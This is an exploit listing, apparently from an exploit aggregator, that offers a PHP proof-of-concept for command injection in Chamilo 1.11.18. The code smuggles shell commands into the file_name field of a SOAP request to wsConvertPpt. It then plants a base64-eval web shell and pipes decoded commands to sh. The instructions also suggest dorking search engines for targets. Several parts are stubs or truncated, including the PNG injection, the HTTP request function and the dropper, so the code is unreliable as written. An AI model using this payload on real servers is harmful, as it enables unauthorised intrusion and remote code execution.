Share
## https://sploitus.com/exploit?id=PACKETSTORM:182147
=============================================================================================================================================  
| # Title : Chamilo 1.11.18 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 123 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class ChamiloExploit {  
private $targetUri;  
private $webshellName;  
private $postParam;  
  
public function __construct($targetUri, $webshell = null) {  
$this->targetUri = rtrim($targetUri, '/');  
$this->webshellName = $webshell ?: $this->generateRandomWebshellName();  
}  
  
private function generateRandomWebshellName() {  
return bin2hex(random_bytes(8)) . '.php';  
}  
  
private function soapRequest($cmd) {  
$pptSize = rand(720, 1440) . 'x' . rand(360, 720);  
return <<<EOS  
<?xml version="1.0" encoding="UTF-8"?>  
<SOAP-ENV:Envelope  
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:ns1="{$this->targetUri}"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:ns2="http://xml.apache.org/xml-soap"  
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"  
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  
<SOAP-ENV:Body>  
<ns1:wsConvertPpt>  
<param0 xsi:type="ns2:Map">  
<item>  
<key xsi:type="xsd:string">file_data</key>  
<value xsi:type="xsd:string"></value>  
</item>  
<item>  
<key xsi:type="xsd:string">file_name</key>  
<value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>  
</item>  
<item>  
<key xsi:type="xsd:string">service_ppt2lp_size</key>  
<value xsi:type="xsd:string">{$pptSize}</value>  
</item>  
</param0>  
</ns1:wsConvertPpt>  
</SOAP-ENV:Body>  
</SOAP-ENV:Envelope>  
EOS;  
}  
  
public function uploadWebshell() {  
$this->postParam = bin2hex(random_bytes(4));  
  
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
$pngWebshell = $this->injectPhpPayloadPng($phpPayload);  
  
if ($pngWebshell === null) {  
return null;  
}  
  
$payload = base64_encode($pngWebshell);  
$cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";  
  
$response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));  
return $response;  
}  
  
private function injectPhpPayloadPng($phpPayload) {  
// Implement your logic to inject PHP payload into a PNG image  
// For demonstration purposes, we'll return a dummy PNG data  
return pack('H*', '89504E470D0A1A0A...'); // Example PNG header  
}  
  
public function executePhp($cmd) {  
$payload = base64_encode($cmd);  
$response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);  
return $response;  
}  
  
public function executeCommand($cmd) {  
$payload = base64_encode($cmd);  
$cmd = "echo {$payload}|openssl enc -a -d|sh";  
$response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));  
return $response;  
}  
  
public function check() {  
$marker = bin2hex(random_bytes(4));  
$res = $this->executeCommand("echo {$marker}");  
if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {  
return 'Vulnerable';  
} else {  
return 'Safe';  
}  
}  
  
public function exploit($payload) {  
switch ($payload['type']) {  
case 'php':  
$res = $this->uploadWebshell();  
if (!$res || strpos($res, 'wsConvertPptResponse') === false) {  
throw new Exception('Web shell upload error.');  
}  
$this->executePhp($payload['encoded']);  
break;  
case 'unix_cmd':  
$this->executeCommand($payload['encoded']);  
break;  
case 'linux_dropper':  
// Implement Linux dropper logic  
break;  
}  
}  
  
private function sendRequest($method, $uri, $ctype, $data) {  
// Implement your HTTP request logic here (using cURL or similar)  
// For demonstration purposes, return a dummy response  
return 'Dummy response';  
}  
}  
  
// Usage  
$exploit = new ChamiloExploit('http://target.com', 'webshell.php');  
$exploit->check();  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================